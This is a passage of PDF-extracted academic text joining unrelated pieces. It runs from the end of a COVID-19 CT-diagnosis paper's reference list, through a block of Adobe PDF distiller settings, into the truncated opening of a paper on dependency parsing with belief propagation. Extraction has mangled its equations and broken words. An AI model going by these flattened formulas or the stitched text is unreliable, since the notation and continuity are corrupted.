Science and Applications (IJACSA) 3:102–105. Shi H, Han X, Zheng C. 2020. Evolution of CT manifestations in a patient recovered from 2019 novel coronavirus (2019-nCoV) pneumonia in Wuhan, China. Radiology 295(1):20 DOI 10.1148/radiol.2020200269. Singh D, Kumar V, Kaur M. 2020. Classification of COVID-19 patients from chest CT images using multi-objective differential evolution-based convolutional neural networks. Epub ahead of print 27 April 2020. European Journal of Clinical Microbiology & Infectious Diseases DOI 10.1007/s10096-020-03901-z. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 29/30 http://dx.doi.org/10.1148/radiol.2020200236 http://dx.doi.org/10.1148/radiol.2020200905 http://dx.doi.org/10.1016/S0734-189X(87)80186-X http://dx.doi.org/10.1016/j.patcog.2017.05.025 http://dx.doi.org/10.3390/s18030699 http://dx.doi.org/10.1001/jama.2020.0757 http://dx.doi.org/10.1007/BF03178082 http://dx.doi.org/10.7717/peerj.6201 http://dx.doi.org/10.1148/radiol.2020200269 http://dx.doi.org/10.1007/s10096-020-03901-z https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 Soares E, Angelov P, Biaso S, Froes MH, Abe DK. 2020. SARS-CoV-2 CT-scan dataset: a large dataset of real patients CT scans for SARS-CoV-2 identification. medRxiv DOI 10.1101/2020.04.24.20078584. Song F, Shi N, Shan F, Zhang Z, Shen J, Lu H, Ling Y, Jiang Y, Shi Y. 2020a. Emerging 2019 novel coronavirus (2019-nCoV) pneumonia. Radiology 295(1):210–217 DOI 10.1148/radiol.2020200274. Song Y, Zheng S, Li L, Zhang X, Zhang X, Huang Z, Chen J, Zhao H, Jie Y, Wang R. 2020b. Deep learning enables accurate diagnosis of novel coronavirus (COVID-19) with CT images. medRxiv DOI 10.1101/2020.02.23.20026930. Srivastava V, Purwar RK. 2017. A five-level wavelet decomposition and dimensional reduction approach for feature extraction and classification of MR and CT scan images. Applied Computational Intelligence and Soft Computing 2017(3):1–9 DOI 10.1155/2017/9571262. Szegedy C, Liu W, Jia Y, Sermanet P, Reed S, Anguelov D, Erhan D, Vanhoucke V, Rabinovich A. 2015. Going deeper with convolutions. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 1–9. Vaishya R, Javaid M, Khan IH, Haleem A. 2020. Artificial Intelligence (AI) applications for COVID-19 pandemic. Diabetes & Metabolic Syndrome: Clinical Research & Reviews 14(4):337–339. Wagh KP, Vasanth K. 2019. Electroencephalograph (EEG) based emotion recognition system: a review. In: Saini H, Singh R, Patel V, Santhi K, Ranganayakulu S, eds. Innovations in Electronics and Communication Engineering. Lecture Notes in Networks and Systems. Vol. 33. Singapore: Springer, 37–59. Wang S, Kang B, Ma J, Zeng X, Xiao M, Guo J, Cai M, Yang J, Li Y, Meng X. 2020. A deep learning algorithm using CT images to screen for Corona Virus Disease (COVID-19). MedRxiv preprint Wei L, Su R, Wang B, Li X, Zou Q, Gao X. 2019a. Integration of deep feature representations and handcrafted features to improve the prediction of N6-methyladenosine sites. Neurocomputing 324:3–9 DOI 10.1016/j.neucom.2018.04.082. Wei W, Zhou B, Polap D, Woźniak M. 2019b. A regional adaptive variational PDE model for computed tomography image reconstruction. Pattern Recognition 92:64–81 DOI 10.1016/j.patcog.2019.03.009. Wieczorek M, Silka J, Woźniak M. 2020. Neural network powered COVID-19 spread forecasting model. Chaos, Solitons & Fractals 140:110203. Wu F, Zhao S, Yu B, Chen Y-M, Wang W, Song Z-G, Hu Y, Tao Z-W, Tian J-H, Pei Y-Y, Yuan M-L, Zhang Y-L, Dai F-H, Liu Y, Wang Q-M, Zheng J-J, Xu L, Holmes EC, Zhang Y-Z. 2020. A new coronavirus associated with human respiratory disease in China. Nature 579:265–269. Xie X, Zhong Z, Zhao W, Zheng C, Wang F, Liu J. 2020. Chest CT for typical 2019-nCoV pneumonia: relationship to negative RT-PCR testing. Radiology 296(2):E41–E45. Zhang J, Sanderson AC. 2009. JADE: adaptive differential evolution with optional external archive. IEEE Transactions on Evolutionary Computation 13(5):945–958 DOI 10.1109/TEVC.2009.2014613. Zhang J, Xia Y, Xie Y, Fulham M, Feng DD. 2017. Classification of medical images in the biomedical literature by jointly using deep and handcrafted visual features. IEEE Journal of Biomedical and Health Informatics 22(5):1521–1530 DOI 10.1109/JBHI.2017.2775662. Zheng C, Deng X, Fu Q, Zhou Q, Feng J, Ma H, Liu W, Wang X. 2020. Deep learning-based detection for COVID-19 from chest CT using weak label. medRxiv DOI 10.1101/2020.03.12.20027185. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 30/30 http://dx.doi.org/10.1101/2020.04.24.20078584 http://dx.doi.org/10.1148/radiol.2020200274 http://dx.doi.org/10.1101/2020.02.23.20026930 http://dx.doi.org/10.1155/2017/9571262 http://dx.doi.org/10.1016/j.neucom.2018.04.082 http://dx.doi.org/10.1016/j.patcog.2019.03.009 http://dx.doi.org/10.1109/TEVC.2009.2014613 http://dx.doi.org/10.1109/JBHI.2017.2775662 http://dx.doi.org/10.1101/2020.03.12.20027185 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 FUSI-CAD: Coronavirus (COVID-19) diagnosis based on the fusion of CNNs and handcrafted features Introduction Methods and materials Performance evaluation Experimental set up Results Discussions Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_ocrpsnsynrh2nb7fy3scvt4ltu ---- Approximation-Aware Dependency Parsing by Belief Propagation Matthew R. Gormley Mark Dredze Jason Eisner Human Language Technology Center of Excellence Center for Language and Speech Processing Department of Computer Science Johns Hopkins University, Baltimore, MD {mrg,mdredze,jason}@cs.jhu.edu Abstract We show how to train the fast dependency parser of Smith and Eisner (2008) for im- proved accuracy. This parser can consider higher-order interactions among edges while retaining O(n3) runtime. It outputs the parse with maximum expected recall—but for speed, this expectation is taken under a pos- terior distribution that is constructed only ap- proximately, using loopy belief propagation through structured factors. We show how to adjust the model parameters to compensate for the errors introduced by this approximation, by following the gradient of the actual loss on training data. We find this gradient by back- propagation. That is, we treat the entire parser (approximations and all) as a differentiable circuit, as others have done for loopy CRFs (Domke, 2010; Stoyanov et al., 2011; Domke, 2011; Stoyanov and Eisner, 2012). The re- sulting parser obtains higher accuracy with fewer iterations of belief propagation than one trained by conditional log-likelihood. 1 Introduction Recent improvements to dependency parsing ac- curacy have been driven by higher-order features. Such a feature can look beyond just the parent and child words connected by a single edge to also con- sider siblings, grandparents, etc. By including in- creasingly global information, these features pro- vide more information for the parser—but they also complicate inference. The resulting higher-order parsers depend on approximate inference and decod- ing procedures, which may prevent them from pre- dicting the best parse. For example, consider the dependency parser we will train in this paper, which is based on the work of Smith and Eisner (2008). Ostensibly, this parser finds the minimum Bayes risk (MBR) parse under a probability distribution defined by a higher-order dependency parsing model. In reality, it achieves O(n3tmax) runtime by relying on three approxima- tions during inference: (1) variational inference by loopy belief propagation (BP) on a factor graph, (2) truncating inference after tmax iterations prior to convergence, and (3) a first-order pruning model to limit the number of edges considered in the higher- order model. Such parsers are traditionally trained as if the inference had been exact.1 In contrast, we train the parser such that the ap- proximate system performs well on the final eval- uation function. We treat the entire parsing com- putation as a differentiable circuit, and backprop- agate the evaluation function through our approx- imate inference and decoding methods to improve its parameters by gradient descent. The system also learns to cope with model misspecification, where the model couldn’t perfectly fit the distribution even absent the approximations. For standard graphical models, Stoyanov and Eisner (2012) call this ap- proach ERMA, for “empirical risk minimization un- der approximations.” For objectives besides empiri- cal risk, Domke (2011) refers to it as “learning with truncated message passing.” Our primary contribution is the application of this approximation-aware learning method in the pars- ing setting, for which the graphical model involves a global constraint. Smith and Eisner (2008) pre- viously showed how to run BP in this setting (by calling the inside-outside algorithm as a subroutine). We must backpropagate the downstream objective 1For perceptron training, utilizing inexact inference as a drop-in replacement for exact inference can badly mislead the learner (Kulesza and Pereira, 2008; Huang et al., 2012). 489 Transactions of the Association for Computational Linguistics, vol. 3, pp. 489–501, 2015. Action Editor: Sebastian Riedel. Submission batch: 4/2015; Published 8/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. function through their algorithm so that we can fol- low its gradient. We carefully define an empirical risk objective function (à la ERMA) to be smooth and differentiable, yet equivalent to accuracy of the minimum Bayes risk (MBR) parse in the limit. Find- ing this difficult to optimize, we introduce a new simpler objective function based on the L2 distance between the approximate marginals and the “true” marginals from the gold data. The goal of this work is to account for the approx- imations made by a system rooted in structured be- lief propagation. Taking such approximations into account during training enables us to improve the speed and accuracy of inference at test time. We compare our training method with the standard ap- proach of conditional log-likelihood (CLL) train- ing. We evaluate our parser on 19 languages from the CoNLL-2006 (Buchholz and Marsi, 2006) and CoNLL-2007 (Nivre et al., 2007) Shared Tasks as well as the English Penn Treebank (Marcus et al., 1993). On English, the resulting parser obtains higher accuracy with fewer iterations of BP than CLL. On the CoNLL languages, we find that on av- erage it yields higher accuracy parsers than CLL, particularly when limited to few BP iterations. 2 Dependency Parsing by Belief Propagation This section describes the parser that we will train. Model A factor graph (Frey et al., 1997; Kschis- chang et al., 2001) defines the factorization of a probability distribution over a set of variables {Y1,Y2, . . .}. It is a bipartite graph between vari- ables Yi and factors α. Edges connect each factor α to a subset of the variables {Yα1,Yα2, . . .}, called its neighbors. Each factor defines a potential func- tion ψα, which assigns a nonnegative score to each configuration of its neighbors yα = {yα1,yα2, . . .}. We define the probability of a given assignment y = {y1,y2, . . .} to be proportional to the product of all factors’ potential functions: p(y) = 1 Z ∏ α ψα(yα). Smith and Eisner (2008) define a factor graph for dependency parsing of a given n-word sentence: n2 binary variables indicate which of the directed arcs are included (yi = ON) or excluded (yi = OFF) in the dependency parse. One of the factors plays the role of a hard global constraint: ψPTREE(y) is 0 2 1 3 4 Juan su abdica reino $ Y2,1 Y1,2 Y3,2 Y2,3 Y3,1 Y1,3 Y4,3 Y3,4 Y4,2 Y2,4 Y4,1 Y1,4 Y0,1 Y0,3 Y0,4 Y0,2 Figure 1: Factor graph for dependency parsing of a 4- word sentence; $ is the root of the dependency graph. The boolean variable Yh,m encodes whether the edge from parent h to child m is present. The unary factor (black) connected to this variable scores the edge in iso- lation (given the sentence). The PTREE factor (red) coor- dinates all variables to ensure that the edges form a tree. The drawing shows a few higher-order factors (purple for grandparents, green for arbitrary siblings); these are re- sponsible for the graph being cyclic (“loopy”). 1 or 0 according to whether the assignment en- codes a projective dependency tree. Another n2 fac- tors (one per variable) evaluate the individual arcs given the sentence, so that p(y) describes a first- order dependency parser. A higher-order parsing model is achieved by also including higher-order factors, each scoring configurations of two or more arcs, such as grandparent and sibling configurations. Higher-order factors tend to create cycles in the fac- tor graph. See Figure 1 for an example factor graph. We define each potential function to have a log- linear form: ψα(yα) = exp(θ ·fα(yα,x)). Here x is the assignment to the observed variables such as the sentence and its POS tags; fα extracts a vector of features; and θ is our vector of model parameters. We write the resulting probability distribution over parses as pθ(y |x), to indicate that it depends on θ. Loss For dependency parsing, our loss function is the number of missing edges in the predicted parse ŷ, relative to the reference (or “gold”) parse y∗: `(ŷ,y∗) = ∑ i: ŷi=OFF I(y∗i = ON) (1) I is the indicator function. Because ŷ and y∗ each specify exactly one parent per word token, `(ŷ,y∗) equals the directed dependency error: the number of word tokens whose parent is predicted incorrectly. 490 Decoder To obtain a single parse as output, we use a minimum Bayes risk (MBR) decoder, which returns the tree with minimum expected loss under the model’s distribution (Bickel and Doksum, 1977; Goodman, 1996). Our ` gives the decision rule: hθ(x) = argmin ŷ Ey∼pθ(· |x)[`(ŷ,y)] (2) = argmax ŷ ∑ i: ŷi=ON pθ(yi = ON |x) (3) Here ŷ ranges over well-formed parses. Thus, our parser seeks a well-formed parse hθ(x) whose in- dividual edges have a high probability of being cor- rect according to pθ (since it lacks knowledge y∗ of which edges are truly correct). MBR is the prin- cipled way to take a loss function into account un- der a probabilistic model. By contrast, maximum a posteriori (MAP) decoding does not consider the loss function. It would return the single highest- probability parse even if that parse, and its individual edges, were unlikely to be correct.2 All systems in this paper use MBR decoding to consider the loss function at test time. This implies that the ideal training procedure would be to find the true pθ so that its marginals can be used in (3). Our baseline system attempts this. Yet in practice, we will not be able to find the true pθ (model misspec- ification) nor exactly compute the marginals of pθ (computational intractability). Thus, this paper pro- poses a training procedure that compensates for the system’s approximations, adjusting θ to reduce the actual loss of hθ(x) as measured at training time. To find the MBR parse, we first run inference to compute the marginal probability pθ(yi = ON |x) for each edge. Then we maximize (3) by running a first-order dependency parser with edge scores equal to those probabilities.3 When our inference algo- rithm is approximate, we replace the exact marginal with its approximation—the belief from BP, given by bi(ON) in (6) below. Inference Loopy belief propagation (BP) (Murphy et al., 1999) computes ap- proximations to the variable marginals 2If we used a simple 0-1 loss function within (2), then MBR decoding would reduce to MAP decoding. 3Prior work (Smith and Eisner, 2008; Bansal et al., 2014) used the log-odds ratio log pθ(yi=ON) pθ(yi=OFF) as the edge scores for decoding, but this yields a parse different from the MBR parse. pθ(yi |x) = ∑ y′:y′i=yi pθ(y ′ |x), as needed by (3), as well as the factor marginals pθ(yα |x) = ∑ y′:y′α=yα pθ(y ′ |x). The algo- rithm proceeds by iteratively sending messages from variables, yi, to factors, α: m (t) i→α(yi) ∝ ∏ β∈N(i)\α m (t−1) β→i (yi) (4) and from factors to variables: m (t) α→i(yi) ∝ ∑ yα∼yi ψα(yα) ∏ j∈N(α)\i m (t−1) j→α (yi) (5) where N(i) and N(α) denote the neighbors of yi and α respectively, and where yα ∼ yi is standard notation to indicate that yα ranges over all assign- ments to the variables participating in the factor α provided that the ith variable has value yi. Note that the messages at time t are computed from those at time (t−1). Messages at the final time tmax are used to compute the beliefs at each factor and variable: bi(yi) ∝ ∏ α∈N(i) m (tmax) α→i (yi) (6) bα(yα) ∝ ψα(yα) ∏ i∈N(α) m (tmax) i→α (yi) (7) We assume each of the messages and beliefs given in (4)–(7) are scaled to sum-to-one. For example, bi is normalized such that ∑ yi bi(yi) = 1 and ap- proximates the marginal distribution over yi values. Messages continue to change indefinitely if the fac- tor graph is cyclic, but in the limit, the messages may converge. Although the equations above update all messages in parallel, convergence is much faster if only one message is updated per timestep, in some well-chosen serial order.4 For the PTREE factor, the summation over vari- able assignments required for m(t)α→i(yi) in Eq. (5) equates to a summation over exponentially many projective parse trees. However, we can use an inside-outside variant of Eisner (1996)’s algorithm 4Following Dreyer and Eisner (2009, footnote 22), we choose an arbitrary directed spanning tree of the factor graph rooted at the PTREE factor. We visit the nodes in topologically sorted order (from leaves to root) and update any message from the node being visited to a node that is later in the order. We then reverse this order and repeat, so that every message has been passed once. This constitutes one iteration of BP. 491 to compute this in polynomial time (we describe this as hypergraph parsing in §3). The resulting “struc- tured BP” inference procedure—detailed by Smith and Eisner (2008)—is exact for first-order depen- dency parsing. When higher-order factors are incor- porated, it is approximate but remains fast, whereas exact inference would be slow.5 3 Approximation-aware Learning We aim to find the parameters θ∗ that minimize a regularized objective function over the training sam- ple of (sentence, parse) pairs {(x(d),y(d))}Dd=1. θ∗ = argmin θ 1 D (( D∑ d=1 J(θ;x(d),y(d)) ) + λ 2 ||θ||22 ) (8) where λ > 0 is the regularization coefficient and J(θ;x,y∗) is a given differentiable function, pos- sibly nonconvex. We locally minimize this objec- tive using `2-regularized AdaGrad with Composite Mirror Descent (Duchi et al., 2011)—a variant of stochastic gradient descent that uses mini-batches, an adaptive learning rate per dimension, and sparse lazy updates from the regularizer.6 Objective Functions The standard choice for J is the negative conditional log-likelihood (§6). How- ever, as in Stoyanov et al. (2011), our aim is to mini- mize expected loss on the true data distribution over sentence/parse pairs (X,Y ): θ∗ = argminθ E[`(hθ(X),Y )] (9) Since the true data distribution is unknown, we sub- stitute the expected loss over the training sample, and regularize our objective in order to reduce sam- pling variance. Specifically, we aim to minimize the regularized empirical risk, given by (8) with J(θ;x(d),y(d)) set to `(hθ(x(d)),y(d)). Note that 5How slow is exact inference for dependency parsing? For certain choices of higher-order factors, polynomial time is pos- sible via dynamic programming (McDonald et al., 2005; Car- reras, 2007; Koo and Collins, 2010). However, BP will typically be asymptotically faster (for a fixed number of iterations) and faster in practice. In some other settings, exact inference is NP- hard. In particular, non-projective parsing becomes NP-hard with even second-order factors (McDonald and Pereira, 2006). BP can handle this case in polynomial time by replacing the PTREE factor with a TREE factor that allows edges to cross. 6θ is initialized to 0 when not otherwise specified. this loss function would not be differentiable—a key issue we will take up below. This is the “ERMA” method of Stoyanov and Eisner (2012). We will also consider simpler choices of J—akin to the loss func- tions 